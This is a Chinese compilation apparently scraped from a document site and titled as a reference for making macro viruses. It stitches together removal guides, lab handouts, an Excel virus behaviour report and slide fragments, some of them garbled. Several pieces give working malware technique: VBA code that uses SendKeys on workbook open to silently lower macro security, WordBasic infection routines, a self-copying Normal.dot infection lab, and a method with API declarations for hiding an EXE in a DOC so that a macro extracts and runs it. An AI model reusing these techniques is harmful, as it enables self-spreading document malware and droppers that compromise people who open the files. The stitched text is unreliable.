宏病毒制作参考

合集下载

关于Office文档中宏病毒的处理方法

关于Office文档中宏病毒的处理方法

关于Office文档中宏病毒的处理方法
Office文档是目前使用最多、最常见的办公文档(它包含Word文档,Excel文档,PPT文档等),由于Office 软件默认的安全级别为中,所以Office文档成了病毒攻击的目标,目前有许多Office文档病毒,最近校园网出现的宏病毒传播,成了大家头疼的一件事,现就处理方法介绍如下,请各老师参考与分享。

1.宏病毒的分析
Office文档中的宏是Office中最高级别的部分,平时大家很少用到,它能把繁重的工作简单化,默认的安全级别为中,宏病毒正是利用这一点通过网络、U盘等进行传播,中毒的电脑明显反应变慢,Office文档大小在不断变化,有的成倍增加,一个小小的电子表格就有2M之多,使用十分困难。

2.感染后的特征
感染后的Office文档,除大小变大外,每次打开都要求启用宏,不启用便不能打开Office文档,或者打开了,全是空白,如果使用杀毒软件,则会把文档删除,给用户带来许多麻烦。

Office软件运行缓慢,电脑经常死机等。

由于现在(QQ、126)邮件系统都集成防毒软件,在发送邮件时上传感染后的Office文档,邮件系统会提示文件发送失败。

3.处理方法
方法一:
点击下载“Office病毒专杀.zip”工具,解压后安装,界面如下:
点击全盘杀毒,即可对电脑中的Office病毒进行全面查杀。

方法二:点击下载安装“新版360杀毒软件.rar”,启动新增Office宏病毒免疫功能。

宏病毒

宏病毒

Office 2K, Outlook 2K, FrontPage 2K Office XP, Outlook 2002, Word 2002, Access 2002, FrontPage 2002
VBA 6.0
VBA 6.3
计算机病毒及其防范技术
• 使用VBA可以实现的功能包括:
– – – – (1)使重复的任务自动化 (2)自定义Word工具栏、菜单和界面 (3)简化模板的使用 ()自定义Word,使其成为开发平台
计算机病毒及其防范技术
– – – – – – – –
'检查正常的宏 End If If MacroName$(i, 0, 0) = "FileSaveAs" Then bTooMuchTrouble = - 1 '但如果FILESAVEAS 宏存在那么传染比较困难. End If Next i If Not bInstalled And Not bTooMuchTrouble Then
计算机病毒及其防范技术
宏病毒关键技术
• (1)自动执行的示例代码:
– – – – – – – Sub MAIN On Error Goto Abort iMacroCount = CountMacros(0, 0) '检查是否感染该文档文件 For i = 1 To iMacroCount If MacroName$(i, 0, 0) = "PayLoad" Then bInstalled = - 1
计算机病毒及其防范技术
• (2) SaveAs 程序:
– 这是一个当使用FILE/SAVE AS功能时,拷贝宏病 毒到活动文本的程序。它使用了许多类似于 AutoExec程序的技巧。尽管示例代码短小,但足以 制作一个小巧的宏病毒。 – Sub MAIN – Dim dlg As FileSaveAs – GetCurValues dlg – Dialog dlg

关于财务部excel宏病毒,非常有效

关于财务部excel宏病毒,非常有效

关于财务部excel宏病毒(XF/Sic.gen)清除方法
请注意财务部门最近传递文件提示有病毒!目前电脑装有杀毒能清除病毒主体,但残余病毒体会重新激活病毒!
具体清除方法如下:
第一步:A、打开文件(如果能打开的话,有些防毒软件会直接杀掉) 选择菜单[插入] ----[名称] ----[定义],如下图:
B、在打开的对话框中,会发现有如下图中所示居多“定义名称”。

此处就是病毒清理不完的根源!将里面内容全部删除。

C、正常情况如下图(若没有进行“定义名称”设定的情况下)
第二步:打开[我的电脑]的如下位置:
C:\Program Files\Microsoft Office\OFFICE11\XLSTART 删除里面的所有内容。

进行完以上步骤后,若excel程序提示其它异常的话,可以关闭程式重新运行即可。

提示:在进行此操作前请先将文件进行备份!。

宏病毒分析实验(新)

宏病毒分析实验(新)

---------------------------------------------------------------最新资料推荐------------------------------------------------------宏病毒分析实验(新)宏病毒分析实验一、实验目的及要求:通过本实验的学习,大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。

二、实验基本原理:宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。

宏病毒的前缀是:Macro,第二前缀是:Word、 Word97、 Excel、 Excel97(也许还有别的)其中之一。

凡是只感染 WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀,格式是:Macro. Word97;凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀,格式是:Macro. Word;凡是只感染 EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀,格式是:Macro. Excel97;凡是只感染 EXCEL97 以后版本 EXCEL 文档的病毒采用 Excel做为第二前缀,格式是:Macro. Excel,依此类推。

该类病毒的公有特性是能感染 OFFICE系列文档,然后通过OFFICE 通用模板进行传播,如:1 / 5著名的美丽莎(Macro. Melissa) 。

一个宏的运行, 特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高, 那么, 没有签署的宏就不能运行了, 甚至, 还能使部分 Excel 的功能失效.所以, 宏病毒在感染 Excel 之前, 会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低. Application. SendKeys%TMSs%L{RETURN} 仅修改这个还不行, 很多宏会涉及到 VisualBasic, 所以, 宏的安全性还要信任对于VisualBasic 项目的访问, 所以, 综合安全级别的修改, 就为 Application. SendKeys%TMSs%LT%v{RETURN} 如何判断信任还是不信任对于VisualBasic 项目的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ‘ 其它功能的程序段ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} 本段程序的功能为: 一旦宏无法正常就进行宏的安全性的修改和对信任对于VisualBasic 项目的访问的修改, 从而这宏病毒的正常运行提供系统支持. 本程序应放在 VBA 中的 ThisWorkbook PrivateSubWorkbook_Open() EndSub 这样一旦打开工作薄就会对其进行有效的修改. 完整的程序为: PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub ‘ 其它功能的程序段 ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} EndSub 三、主要仪器设备及实验耗材:PC 电脑一台四、实验内容或步骤:---------------------------------------------------------------最新资料推荐------------------------------------------------------ 1.启动 Word,创建一个新文档。

宏病毒原理及案例分析

宏病毒原理及案例分析

宏病毒原理及案例分析屈立成4114005088什么是宏?所谓宏,就是一些命令组织在一起,作为一个单独命令完成一个特定任务。

Microsoft Word中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易”。

Word使用宏语言Word_Basic将宏作为一系列指令来编写。

Word宏病毒是一些制作病毒的专业人员利用Microsoft Word的开放性即word中提供的Word BASIC编程接口,专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机的使用,并能通过.DOC文档及.DOT 模板进行自我复制及传播。

宏可使任务自动化,如果在Word中重复进行某项工作,可用宏使其自动执行。

宏是将一系列的Word命令和指令结合在一起,形成一个命令,以实现任务执行的自动化。

用户可创建并执行一个宏,以替代人工进行一系列费时而重复的Word操作。

事实上,它是一个自定义命令,用来完成所需任务。

宏的一些典型应用如:加速日常编辑和格式设置、组合多个命令、使对话框中的选项更易于访问、使一系列复杂的任务自动执行等。

Word 提供了两种创建宏的方法:宏录制器和Visual Basic 编辑器。

宏录制器可帮助用户开始创建宏。

Word 在VBA 编程语言中把宏录制为一系列的Word 命令。

可在Visual Basic 编辑器中打开已录制的宏,修改其中的指令。

也可用Visual Basic 编辑器创建包括Visual Basic 指令的非常灵活和强有力的宏,这些指令无法采用录制的方式。

VBAVisual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化任务的编程语言。

主要能用来扩展Windows的应用程式功能,特别是Microsoft Office软件。

也可说是一种应用程式视觉化的Basic 脚本。

Word宏病毒实验

Word宏病毒实验

Word宏病毒实验应用场景计算机病毒是一个程序,一段可执行码,对计算机的正常使用进行破坏,使得电脑无法正常使用甚至整个操作系统或者电脑硬盘损坏。

就像生物病毒一样,计算机病毒有独特的复制能力。

计算机病毒可以很快地蔓延,又常常难以根除。

它们能把自身附着在各种类型的文件上。

当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。

这种程序不是独立存在的,它隐蔽在其他可执行的程序之中,既有破坏性,又有传染性和潜伏性。

轻则影响机器运行速度,使机器不能正常运行;重则使机器处于瘫痪,会给用户带来不可估量的损失。

通常就把这种具有破坏作用的程序称为计算机病毒。

除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。

当你看到病毒载体似乎仅仅表现在文字和图像上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。

若是病毒并不寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。

病毒往往会利用计算机操作系统的弱点进行传播,提高系统的安全性是防病毒的一个重要方面,但完美的系统是不存在的,过于强调提高系统的安全性将使系统多数时间用于病毒检查,系统失去了可用性、实用性和易用性,另一方面,信息保密的要求让人们在泄密和抓住病毒之间无法选择。

病毒与反病毒将作为一种技术对抗长期存在,两种技术都将随计算机技术的发展而得到长期的发展。

宏病毒是使用宏语言(VBA)编写的恶意程序,存在于字处理文档、电子数据表格、数据库等数据文件中,例如office 数据处理系统中运行,利用宏语言的功能将自己复制、繁殖到其他数据文档中。

宏分成两种:一种是在某个文档中包含的内嵌宏,如fileopen 宏;另一种是属于word 应用程序,所有打开文档公用的宏,如autoopen 宏。

Word 宏病毒一般都首先隐藏在一个指定的word 文档中,一旦打开了这个word 文档,宏病毒就被执行,宏病毒要做的第一件事情就是将自己copy 到全局宏的荡然区域,使得所有打开的文档都可以使用这个宏。

《宏病毒分析报告》课件

《宏病毒分析报告》课件

运用安全软件找到宏病毒
如何利用安全软件检测和定位宏病毒的存在?探讨常用安全软件中的宏病毒 检测功能及其使用。
典型宏病毒案例解析
透过典型的宏病毒案例,深入分析宏病毒的攻击方式、目标以及对受害者造成的影响。
宏病毒的防范措施
根据宏病毒的特点和传播方式,制定恰当的宏病毒防范措施,确保计算机系统的安全。
宏病毒的传播途径
宏病毒是如何传播的?了解它利用哪些途径侵入计算机系统,以及如何避免 宏病毒的传播。
宏病毒的目标
宏病毒主要攻击什么类型的文件和系统?了解宏病毒对不同目标的影响及其 潜在威胁。
宏病毒的特点
宏病毒的其他病毒的区别。
宏病毒的危害
《宏病毒分析报告》PPT 课件
这份《宏病毒分析报告》PPT课件将带您深入了解宏病毒的定义、传播途径、 分类、危害以及防范措施。让我们一起探索这个隐藏在电脑中的隐患。
病毒概述
什么是宏病毒?了解病毒及其分类的基本概念,以及宏病毒在计算机系统中的角色和功能。
发现宏病毒的原因
为什么宏病毒成为计算机系统中的威胁?探讨宏病毒被发现的背后原因,以 及可能导致宏病毒感染的行为和情境。
宏病毒属于哪种威胁
将宏病毒与其他计算机安全威胁进行对比,了解宏病毒在黑客攻击和信息安全中的角色和影响。
如何保护电脑避免宏病毒
学习保护计算机免受宏病毒感染的最佳实践,包括使用防病毒软件、限制宏 病毒的执行和保持操作系统更新。
防范宏病毒的建议
了解有效的防范宏病毒的方法和策略,以及避免宏病毒传播的最佳实践。
宏病毒常见的攻击方式
宏病毒如何达到其攻击目的?探索宏病毒常见的攻击方式,以及如何应对和 防范这些攻击手法。
可能会感染宏病毒的文件类型
宏病毒可能感染哪些常见的文件类型?了解宏病毒针对的文件扩展名以及宏病毒在这些文件中的隐藏方式。

实验3宏病毒.

实验3宏病毒.

XI`AN TECHNOLOGICAL UNIVERSITY 实验报告一.实验目的1.理解WORD宏病毒的感染方式2.理解WORD宏病毒的工作原理3.掌握WORD宏病毒的杀毒方法二.实验原理WORD的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素:菜单、宏、格式(如备忘录)等。

模板是文本、图形和格式编排的蓝图,对于某一类型的所有文档来说,文本、图像和格式编排都是类似的。

WORD提供了几种常见文档类型的模板,如备忘录、报告和商务信件。

你可以直接使用模板来创建新文档,或者加以修改,也可以创建自己的模板。

一般情况下,WORD自动将新文档基于缺省的公用模板NORMAL.DOT。

由此可以看出,模板在建立整个文档中起的作用是作为基类,文档继承模板的属性,包括宏、菜单、格式等。

另外,WORD还提供强大的宏功能。

宏是能组织到一起作为一个独立命令使用的一系列WORD命令,它能使日常工作变得更容易。

在WORD启动时,会自动加载NORMAL.DOT模板,以及它们所包含的宏。

您可以为宏指定特殊的名称,使其变为自动宏,以便在执行某一操作时,如:启动WORD或打开文档,就自动执行具有特殊命名的宏。

同其他宏一样,你可以将自动宏定义在一个共用模板上,也可以将其定义在一个特定模板上。

宏病毒主要寄生在以下3个宏中:AUTOOPEN、AUTONEW、AUTOCLOSE。

带病毒文档打开时,将病毒传染给NORMAL.DOT公用模板中,再由公用模板传染给所有其它正常的文档。

二.MOTHERSDAYVIRUS病毒感染机制MOTHERSDAYVIRUS宏病毒感染WORD文档和NORMAL.DOT文档。

被感染的WORD文档打开时或关闭时会首先弹出一个对话框,对话框关闭后再将控制权转移给正常的WORD文档执行。

MOTHERSDAYVIRUS使用DOCUMENT_OPEN宏(文档打开时执行)感染NORMAL.DOT,使用AUTOCLOSE自动宏感染其它文档。

宏病毒原理和实现

宏病毒原理和实现

标准宏
FileSave FileSaveAs FilePrint FileOpen
保存文件 改名另存为文件 打印文件 打开文件
3、宏病毒的自我隐藏
高明的病毒编写者其自我保护将做得非常好,可以使word
的常用一代些码工示具例栏:失效,例如将工具菜单中的宏选项屏蔽,也
可以修改注册表达到很好的隐藏效果。
WORD 宏病毒的生命周期 1 • 某个宏病毒对文档取得控制权 2 • 该病毒将自身复制到通用模板 3 • 通用模板在启动时自动调用
21
Word宏病毒的感染过程
→编程语言:VBA、WordBasic等 →运行环境:VBE
宏病毒原理大揭秘
1、降低宏安全级别
以office2003版为例
If Application.Version <> “11.0” Then ’判断office版本 strFullname = ThisWorkbook.FullName '取得当前工作薄的全名
VBA5
1999 Office2000(WORD10)
VBA6
2001 OfficeXP
VBA6.2
2003 Office2003(WORD11)
VBA6.3
Office自带 Visual Basic 编辑器
office2007 查看宏代码可以点击: 视图> 宏 > 编辑
注: 1、调用VB编辑器的快 捷方式: Alt + F11 2、查看宏的快捷键: Alt + F8
VBA 可以访问许多操作系统函数并支持文 档打开时自动执行宏 ——这使得用这种语言写计算机病毒 成为可能
Office各版本及其宏语言
年份
Office版本

宏病毒实验报告

宏病毒实验报告

宏病毒实验报告一、实验目的本次实验旨在深入了解宏病毒的工作原理、传播方式以及其对计算机系统可能造成的危害,并通过实际操作和观察,探索有效的防范和清除策略。

二、实验环境1、操作系统:Windows 10 专业版2、办公软件:Microsoft Office 20193、杀毒软件:_____杀毒软件三、实验原理宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

当打开包含宏病毒的文档时,宏病毒会被自动激活,并执行其中的恶意代码。

宏病毒通常利用 Office 软件中的宏功能来实现自我复制、传播和破坏操作。

四、实验步骤1、准备带有宏病毒的测试文档从网络上获取已知的含有宏病毒的示例文档。

对获取的文档进行备份,以防对实验环境造成不可恢复的破坏。

2、观察宏病毒的激活过程打开带有宏病毒的文档。

留意弹出的警告提示,记录相关信息。

3、分析宏病毒的行为观察文档中的内容是否被篡改。

检查计算机系统的性能是否受到影响,如 CPU 使用率、内存占用等。

4、尝试清除宏病毒使用安装的杀毒软件进行扫描和清除。

手动删除相关的宏代码。

五、实验结果与分析1、宏病毒激活情况打开测试文档时,Office 软件弹出了宏安全警告,但仍可以选择启用宏。

一旦启用宏,病毒立即开始执行恶意操作。

2、宏病毒的行为表现文档中的部分文本被修改,格式变得混乱。

CPU 使用率短时间内飙升,系统运行变得卡顿。

3、清除效果杀毒软件能够检测到宏病毒,并成功清除大部分感染,但仍有部分残留。

手动删除宏代码后,文档恢复正常,系统性能也逐渐恢复。

六、实验结论1、宏病毒具有较强的隐蔽性和破坏性,能够在用户不知情的情况下对文档和系统造成损害。

2、办公软件的宏安全设置对于防范宏病毒至关重要,用户应保持较高的安全意识,不轻易启用来源不明的宏。

3、杀毒软件在宏病毒的清除方面起到了一定的作用,但仍需不断更新病毒库和优化清除算法,以应对不断变化的宏病毒威胁。

4、定期备份重要的文档和数据是防范宏病毒造成严重损失的有效措施。

officeexcel宏病毒X97MOLEMALA 病毒处理

officeexcel宏病毒X97MOLEMALA 病毒处理

X97M_OLEMAL.A病毒处理手册
病毒名称:
X97M_OLEMAL.A
病毒行为如下:
1.如果禁用宏,感染的文件打开的时候会弹出如下的对话框。

或者打开失败。

2.感染的文件,会在ThisWorkbook下添加如下脚本
3.在Excel的启动目录释放k
4.xls文件,用于感染其他Excel文件
4.在Excel文件中添加模块,模块中包含恶意代码
5.修改如下注册表,这些注册表会将Excel宏安全属性设置为低,并启用
信任对所有“Visual Basic项目”的访问
选项
6.为每张工作表添加Auto_Activate事件,用于弹出行为1的窗口
7.如果时间在11:00-12:00 或者14:00-15:00之间打开被感染的Excel,将会创建一个VB脚本进程,收集Outlook的邮箱地址,并存放到一个文件中
8.如果时间在11:00之前,则将Excel作为附件发送给之前收集到的收件人
打开附件的范例:
专杀工具路径\\cnkssid00\public\Tools\TMCleanMacro。

Word宏病毒试验

Word宏病毒试验

实验四Word宏病毒试验专业班级学号姓名实验学时实验类型实验地点实验时间指导老师高虎实验成绩年月日一实验目的1. 演示宏的编写2. 说明宏的原理及其安全漏洞和缺陷3. 理解宏病毒的作用机制二实验环境Windows 系列操作系统Word2003 应用程序实验素材:experments 目录下的macro 目录的macro_1.txt。

三实验步骤1.软件设置:关闭杀毒软件的自动防护功能。

2.打开Word 2003,在工具 宏 安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic 项目的访问。

3.自我复制功能演示。

一个word 文档,然后按Alt+F11 调用宏编写窗口(工VisualBasic 宏编辑器),在左侧的project—>Microsoft Word 对象 ThisDocument中输入源代码(参见源代码一或者从光盘上拷贝,位置为:“光盘盘符:\Experiment\macro\macro_1.txt‖),保存。

此时当前word 文档就含有宏病毒,只要下次打开这个word 文档,就会执行以上代码,并将自身复制到Normal.dot(word 文档的公共模板)和当前文档的ThisDocument 中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open)。

此时所有的word 文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word 的正常使用,本例中只是简单的跳出一个提示框。

4. 清除宏病毒对每一个受感染的Word 文档进行如下操作:打开受感染的Word 文档,进入宏编辑环境(按Alt+F11 键),打开Normal|MicrosoftWord 对象|This Document,清除其中的病毒代码(只要删除所有内容即可)。

然后打开Project|Microsoft Word|This Document,清除其中的病毒代码。

宏病毒实验报告

宏病毒实验报告

宏病毒实验报告201424010257 邹文敏一、实验目的通过运行计算机代码,更加深刻的理解计算机代码。

对计算机代码有一个初步的认识。

加深对宏病毒的感性认识,宏病毒是感染数据文件word,office等。

二、实验内容运行自我复制,感染word公用模板和当前文档;具有一定破坏性的宏;清除宏病毒。

三、实验步骤实验一:●将word文档中的开发者工具打开;word 中心→信任选项→宏设计将信任选项打开●运行第一个实验Visual Basic →normal →Microsoft→the documentProject→microsoft word对象→the document复制如下代码:'APMPPrivate Sub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.VirusProtection = FalseOptions.SaveNormalPrompt = False '以上都是基本的自我隐藏措施MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then _Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule With HostIf .Lines(1, 1) <> "'APMP" Then '判断感染标志.DeleteLines 1, .CountOfLines '删除目标文件所有代码.InsertLines 1, MyCode '向目标文档写入病毒代码If ThisDocument = NormalTemplate Then _ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd WithMsgBox "Basic class macro by jackie", vbOKOnly, "APMP"End Sub保存时注意保存为宏文件实验一运行截图:清除实验一中的内容只需要删除,the document 中的内容在保存即可。

计算机病毒实验之宏病毒

计算机病毒实验之宏病毒

计算机病毒实验报告实验3.2 台湾No.1宏病毒3.2 台湾No.1宏病毒3.2.1 实验目的了解台湾No.1宏病毒的基本概念实验自己的台湾No.1宏病毒3.2.2 实验原理台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏,其代码主要是造成恶作剧,并且有可能使用户计算机因为使用资源枯竭而瘫痪。

3.2.3 实验预备知识点】什么是Word宏对VBA语言有一定的了解3.2.4 实验环境操作系统:WINDOWS2000JDK版本:Java Standard Edition 1.4.0以上数据库:MysqlWeb服务器:TomacatOffice版本:MS office2000/20033.2.5 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界,输入用户名和密码。

(注意:实验前先关闭所有杀毒软件。

)1.病毒感染实验由于该病毒特征码明显,因此请首先将病毒防火墙关闭,将系统时间调整到13日。

进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“病毒感染实验”,要根据要求和提示操作配置客户端的邮件地址,如下图3-2-1所示。

根据提示下载提供的台湾No.1病毒,亲自运行并记录自己的实验报告。

图3-2-1 病毒样本下载页面2.病毒代码分析进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“病毒代码分析”,可以分析页面中的台湾No.1病毒源代码,根据相关代码分析,填写页面中空白的参数,点击确定系统将自动生成代码。

新建一个word文档作为自己编写的该病毒文件,然后把生成的代码复制并粘帖至Word自带的VBA编译工具中,可以参照美丽莎宏病毒实验中的图4-3至4-4 。

将自行编制的病毒备份待用。

3.杀毒实验进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“杀毒实验”,学习病毒防范方法,根据系统页面上的提示,使用手动杀毒,并写入实验报告中。

东华大学计算机病毒课实验六宏病毒实验报告

东华大学计算机病毒课实验六宏病毒实验报告

计算机病毒实验报告姓名:学号:老师:日期:一。

实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。

本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。

二. 实验内容1。

macro virus中的内容2。

信安实验平台—-—>计算机病毒篇 -———>计算机宏病毒3。

结合杀毒软件如诺顿、卡巴斯基等,观察病毒查杀现象三. 实验环境1。

macro virus硬件设备:局域网,终端PC机.系统软件:Windows系列操作系统支撑软件:Word 2003软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问。

实验环境配置如下图所示:受感染终端受感染Word文档被感染终端2。

计算机宏病毒硬件设备:部署 WIN2003 系统的PC 机一台软件工具:Office word2007四.实验步骤及截图1.自我复制,感染word公用模板和当前文档打开一个word文档,然后按Alt+F11调用宏编写窗口(工具宏 Visual Basic 宏编辑器),在左侧的project-〉Microsoft Word对象 ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。

宏与宏病毒实验

宏与宏病毒实验

宏与宏病毒实验1.宏病毒介绍宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。

从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒,我们称此文档感染了宏病毒;如果 WORD系统中的模板包含了宏病毒,我们称WORD系统感染了宏病毒。

所谓宏是将一系列word命令和指令组合起来,形成一个命令,实现任务执行的自动化。

在word中有一类很实用的自动宏,会在特定事件发生时自动运行,word提供的5个自动宏是:(1) Autoexec宏在启动word时自动运行;(2) Autoexit宏在退出word时自动运行;(3) Autonew宏在新建文档时自动运行;(4) Autoopen宏在打开文档时自动运行;(5) Autoclose宏在关闭文档时自动运行;2.实验环境实验环境:windows2000及以上或windows XP所需软件:office word3.实验步骤(1)首先,依次选择“工具”-“宏”-“录制宏”菜单命令,接着弹出“录制宏”界面,如下图:接着在“宏名”下面的输入框中输入新宏的名称“yuan ”,接着单击“键盘”图标。

在弹出的“自定义键盘”界面中指定快捷键,比如ctrl+y ,单击左下角“指定”按钮后,再单击右下角的“关闭”按钮,回到”录制宏“界面。

这时单击”确定“按钮启动记录器。

接着,依次选择“插入“-”符号“菜单命令,弹出”符号“界面。

选择”符号“选项卡,在”符号“框中选择”¥“,单击”插入“按钮后再单击”关闭“按钮。

单击“停止录制“工具栏中的”停止录制“按钮。

以后,当需要插入字符“¥”的时候,只需要按下ctrl+y组合键。

(2) 给word文档加上通用的密码关闭word文档,当再次打开文档的时候,需要输入密码才能看到内容和修改。

office 宏病毒处理方法

office 宏病毒处理方法

Office文档是目前使用最多也是最常见的办公文档(它包含Word文档,Excel文档,PPT文档等),以至于Office软件成了大家必备的软件,由于Office软件默认的安全级别为中,所以O ffice文档成了病毒攻击的目标,目前有许多Office文档病毒,以最近教科局出现的宏病毒为例,成了大家头疼的一件事,现就个人处理方法介绍如下,供大家参考与分享。

1、宏病毒的分析
Office文档中的宏是Office中最高级别的部分,平时大家很少用到,它能把繁重的工作简单化,默认的安全级别为中,宏病毒正是利用这一点通过网络、U盘等进行传播,中毒的电脑明显反应变慢,Office文档大小在不断变化,有的成倍增加,一个小小的电子表格就有2M之多,使用十分困难。

2、中毒后文件的特征
中毒后的Office文档,除大小变大外,每次打开都要求启用宏,不启用便不能打开Office文档,或者打开了,全是空白,如果使用杀毒软件,则会把文档删除,给用户带来许多麻烦。

O ffice软件运行缓慢,电脑经常死机等。

3、处理方法:
在网上下载“Office病毒专杀”工具(下载地址:http://ww /html/5254.html),解压后安装,界面如下:
点击全盘杀毒,即可对电脑中的Office病毒进行全面查杀。

备注:该软件使用前要关闭其他杀毒软件!。

宏病毒分析报告PPT课件

宏病毒分析报告PPT课件
宏病毒正式利用了在Word和其他办公软件如Excel 中所具有的宏特征进行病毒感染,本质上,它是嵌入到 字处理文档或其他类型文件中的一段可执行代码。
编辑版pppt
3
宏病毒的危害
一、宏病毒的主要破坏 1.对WORD运行的破坏是:不能正常打印;封闭或改变
文件存储路径;将文件改名;乱复制文件;封闭有关菜单; 文件无法正常编辑。如Taiwan No.l Macro病毒每月13日 发作,所有编写工作无法进行。
1、预防
(1)将常用的Word模板文件改为只读属性,可防止
Word系统被感染;DOS下的autoexec.bat和config .sys文 件最好也都设为只读属性文件。
(2)因为宏病毒是通过自动执行宏的方式来激活、进 行传染破坏的,所以只要将自动执行宏功能禁止掉,即使 有宏病毒存在,但无法被激活,也无法发作传染、破坏, 这样就起到了防毒的效果。可以使用下面命令行来使所有 自动宏无效:
编辑版pppt
10
编辑版pppt
11
感谢亲观看此幻灯片,此课件部分内容来源于网络, 如有侵权请及时联系我们删除,谢谢配合!
12
虽然不是所有包含宏的文档都包含了宏病毒,但当有下列
情况之一时,您可以百分之百地断定您的OFFICE文档OFFICE
系统中有宏病毒:
1、在打开“宏病毒防护功能”的情况下,当您打开一个您自 己写的文档时,系统会弹出相应的警告框。而您清楚您并 没有在其中使用宏或并不知道宏到底怎么用,那么您可以 完全肯定您的文档已经感染了宏病毒。
2.对系统的破坏是:Word Basic语言能够调用系统命 令,造成破坏。 二、宏病毒隐蔽性强,传播迅速,危害严重,难以防治
与感染普通.EXE或.COM文件的病毒相比,Word宏病毒 具有隐蔽性强,传播迅速,危害严重,难以治愈等特点。
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

-- Word宏病毒制作,传播,防范
EXE变DOC的方法
其实这种转换并不是文件格式上的变化,只不过是把一个exe文件接在一个doc文件的末尾而已,这个doc
文件当然就不是不同word的文档啦,该文档中包含了宏语句,能在
运行的时候把接在自己文件末尾的exe文件数据读取出来并运行,就
造成一种假象,好象文档打开时就运行了exe文件似的.(和文件捆绑器的原理很象啊!)
熟悉vb的朋友都知道,word的宏是使用vba来编写的,具体语法和vb一样,但有些方法vb中没有,如宏病毒
就是利用宏复制语句来达到感染的目的.和vb一样,我们可以在编写宏的时候调用windows api!!下面我们来介绍一下我们编写这个宏需要用到的api函数:
1)createfile 用于打开文件,该函数vb的声明如下:
declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string,
byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributes
as long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long
2)closehandle 用于关闭被打开文件的句柄,该函数vb的声明如下:
declare function closehandle lib "kernel32" (byval hobject as long) as long
3)readfile 用于从被打开文件中读取数据,该函数vb的声明如下:
declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoread
as long, lpnumberofbytesread as long, byval lpoverlapped as long) as long
4)writefile 用于把读取出的数据写入文件,该函数vb的声明如下:
declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowrite
as long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long
5)setfileponiter移动文件指针,该函数vb的声明如下:
declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byval
lpdistancetomovehigh as long, byval dwmovemethod as long) as long
6)下面是以上函数的参数声明
public const generic_read as long = &h80000000
public const generic_write as long = &h40000000
public const file_share_read as long = 1
public const file_share_write as long = 2
public const create_new as long = 1
public const create_always as long = 2
public const open_existing as long = 3
public const open_always as long = 4
public const truncate_existing as long = 5
public const invalid_handle_value as long = -1
public const file_attribute_normal as long = &h80
